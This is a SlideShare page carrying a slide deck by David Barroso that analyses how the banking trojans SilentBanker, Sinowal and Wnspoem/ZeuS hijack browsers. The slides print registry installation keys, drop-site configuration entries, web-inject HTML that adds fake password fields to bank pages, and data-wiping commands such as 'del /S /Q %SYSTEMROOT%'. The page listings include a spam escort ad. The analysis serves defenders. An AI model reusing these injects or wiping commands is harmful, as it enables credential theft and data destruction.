Respuesta ágil ante incidentesDavid Barroso
 
[FTP|SQL|Cache] Injections
[FTP|SQL|Cache] Injections[FTP|SQL|Cache] Injections
[FTP|SQL|Cache] InjectionsDavid Barroso
 
iPhone + Botnets = Fun
iPhone + Botnets = FuniPhone + Botnets = Fun
iPhone + Botnets = FunDavid Barroso
 

More from David Barroso (12)

El replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridadEl replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridad
 
OPSEC - Amanece que no es poco
OPSEC - Amanece que no es pocoOPSEC - Amanece que no es poco
OPSEC - Amanece que no es poco
 
Infección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivadosInfección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivados
 
En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?
 
Ataques dirigidos contra activistas
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistas
 
Un gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoSUn gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoS
 
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dos
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dosYersinia - Demostraciones prácticas de nuevos ataques de nivel dos
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dos
 
Recursos de la economía sumergida
Recursos de la economía sumergidaRecursos de la economía sumergida
Recursos de la economía sumergida
 
Extorsiones mediante DDoS
Extorsiones mediante DDoSExtorsiones mediante DDoS
Extorsiones mediante DDoS
 
Respuesta ágil ante incidentes
Respuesta ágil ante incidentesRespuesta ágil ante incidentes
Respuesta ágil ante incidentes
 
[FTP|SQL|Cache] Injections
[FTP|SQL|Cache] Injections[FTP|SQL|Cache] Injections
[FTP|SQL|Cache] Injections
 
iPhone + Botnets = Fun
iPhone + Botnets = FuniPhone + Botnets = Fun
iPhone + Botnets = Fun
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 

Common Browser Hijacking Methods

  • 1. *[ Common Browser Hijacking Methods] David Barroso TERENA Meeting, León
  • 2. Agenda Browser Hijacking Examples: SilentBanker, Sinowal, Wnspoem Kill the Operating System Summary 2
  • 4. Definition “Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia) Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user 4
  • 5. Why are they asking for so many data? 5
  • 7. SilentBanker Date: 2007 Method: Browser Helper Object Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Misc: more than 75 mutations 7
  • 9. SilentBanker: BHO Installation [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}] @="Microsoft Shared Library Object Version" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}InprocServer32] @="C:WINDOWSsystem32mfc42dx1.dll" "ThreadingModel"="Apartment" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}ProgID] @="SharedObject.SharedObjectVersion.1" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}TypeLib] @="{5F226421-415D-408D-9A09-0DCD94E25B48}" [HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}VersionIndependentProgID] @="SharedObject.SharedObjectVersion" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects {0000AC13-3487-1583-C4BE-BE6A839DB000}] 9
  • 10. SilentBanker: Configuration File Get X.Y.67.30/~ipcount/ww6/getcfg.php? id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442 10
  • 11. SilentBanker: Configuration File The encrypted configuration file includes: [dfgdf] • Additional configuration sources Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php • Dropsite URL Bg2=A.B.100.103/ww6/getcfg.php • Update URL • Data encryption key [nbmx] Bg1=X.Y.67.30/~ipcount/ww6/data.php Bg2=A.B.100.103/ww6/data.php [kjew] Bg1=X.Y.67.30/~ipcount/ww6/file.exe Bg2=A.B.100.103/ww6/file.exe [sdfs] secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585… 11
  • 12. SilentBanker: Injection Configuration Get X.Y.67.30/~ipcount/ww6/getcfg.php? Action pok id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442 qas Target URL njd Begin replacement token dfr Number of characters in njd -1 xzn End replacement token [jhw18] xzq Number of characters in xzn -1 pok=insert rek HTML code injected qas=passport.yandex.ru/passport req Number of characters in rek -1 njd=3ECFE0F0EEEBFC3A3C28 dfr=9 insert insert injected HTML code between tokens xzn=3C2367653E69 delete delete HTML code in xzn xzq=5 replace replace HTML code in xzn rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE subreq substitute xzn with rek BE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206 grab extract field in xzn A767167752122292431222070796E666621227661636867223E0D0A202020203C 766163686720676C63722122636E66666A6265712220616E7A722122636E66666… req=331 12
  • 13. SilentBanker: Injection Configuration <ge inyvta!"gbc"> <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq> <gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq> <gq jvqgu!")$1" pynff!"vachg"> <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1" gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq> <gq jvqgu!"&)1"><oe><#gq> <#ge> ROT-13 Algorithm <tr valign="top"> <td width="8%"><div style="width: 40px;"><br /></div></td> <td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td> <td width="50%" class="input"> <input type="password" name="passwd2" value="" style="width:50%" tabindex="2 &nbsp;&nbsp;<br/> </td> <td width="25%"><br></td> </tr> 13
  • 16. Sinowal/Anserin/Torpig Date: 2005 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits and email Misc: infects Master Boot Record (MBR) to be stealth 16
  • 17. Sinowal: Injection Sinowal does not have a configuration file with details about all the injections Each time the user connects to a specific sites, Sinowal asks its injection server for instructions 17
  • 18. Sinowal: Injection Example GET host/Key/EncryptedData GET host/EFAAC5AEB85FF1D1/ MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1 I want the answer Tell me the fake This is the targeted encrypted page path brand 18
  • 19. Sinowal: Injection Example Step 3: The injection server looks for the targeted brand: UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php 204 USA onlineid.bankofamerica.com /cgi- bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3 ES www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2 19
  • 20. Sinowal: Injection Example 2: You need a GET of to enabled 5: number 0: Number1: Injection of visits This is the fake page injection attempts the real URL Step 4: the injection server answers path www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1 20
  • 21. Sinowal: Targeted URLs HTTP Forwarding • PL: 7 (Web Injects) • AU: 26 • UK: 40 • SK: 5 • DE: 47 • NZ: 8 • US: 65 • NL: 4 • ES: 30 • SG: 2 • IT: 18 • AT: 7 • TR: 44 21
  • 22. Wnspoem/PRG/ZeuS/Ntos Date: 2006 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Version 1 Version 2 Version 3 Version 4 Directory wnspoem sysproc64 twain_32 lowsec Filename ntos.exe oembios.exe twext.exe sdra64.exe Stolen data audio.dll sysproc86.sys local.ds local.ds Configuratio video.dll sysproc32.sys user.ds user.ds n 22
  • 25. Wnspoem: Hooks Wsock32.dll (FTP/POP3 capture) Wininet.dll (Capture data, inject • Send HTML) • Sendto • HTTPSendRequest • Closesocket • InternetReadFile Ws2_32.dll (FTP/POP3) • InternetReadFileEx • Send • InternetQueryDataAvailable • Sendto • InternetCloseHandle • WSASend • HTTPQueryInfo • WSASendTo Ntdll.dll (Infect processes and hide • Closesocket files) User32.dll (Keylogger) • NtCreateThread • GetMessage • LdrLoadDll • PeekMesasge • LdrGetProcedureAddress • GetClipboardData • NtQueryDirectoryFile Crypt32.dll (Certificates) • PFXImportCertStore 25
  • 26. Wnspoem: Configuration File Configuration files in latest wnspoem version uses RC4 and 256-bits keys set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP data_before name="password"*</td>*</td> data_end data_inject <td align="left" colspan="7" valign="bottom"></td></tr><tr> <td class="textoHome" align="left">3. Clave de Transferencias</td> <td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td> <td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3 " class="TextoContenido"></td> data_end data_after data_end 26
  • 29. Wnspoem: HTTP Forwarding Some banks use security tokens or more complex 2nd authentication than a password In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site 29
  • 30. Wnspoem: HTTP Forwarding In the configuration file: @https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.ph p @https://*.cajasur.es/* https://*.cajasur.es/* http://compromisedhost.com/img/commons/cajasur/index.ph p 30
  • 32. Wnspoem: Statistics Analysis and Statistics: Configuration files 750 configuration files (usually cfg.bin) analyzed. Only wnspoem version 1, 2 and 3 32
  • 33. Wnspoem: Top 10 TLD 33
  • 36. Wnspoem: Malicious IP Addresses 36
  • 38. Kill the Operating System It is getting more common that just after stealing the credentials, the operating system is remotely destroyed This action makes the analysis more difficult, since cannot be done remotely. The malicious code is not securely deleted in the system and can be recovered One optimistic result is that the machine will be reformated with a new and patched operating system. 38
  • 39. Kill the Operating System Nethell: • Deletes NTDETECT.COM and ntldr InfoStealer: • Deletes drivers*.sys • Deletes some registry keys (HKLMMicrosoftWindows NTCurrentVersionWinlogon: Shell = Explorer.exe Wnspoem: • Deletes HKCU, HKLMSoftware and HKLMSystem Glacial Dracon: • del /A:S /Q /F C:*.* • del /S /Q %SYSTEMROOT% %PROGRAMFILES% 39
  • 41. Summary Browser Hijacking is actively used in fraud schemes Targeted brands are all around the world Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox) Be suspicious if your browser is asking for too much information Be more suspicious if your computer stops working just after your browsing is asking for too much information ☺ 41
  • 42. Thanks David Barroso S21sec e-crime Director dbarroso@s21sec.com http://blog.s21sec.com lostinsecurity
  • 43. *[ MUCHAS GRACIAS ] Pág. 43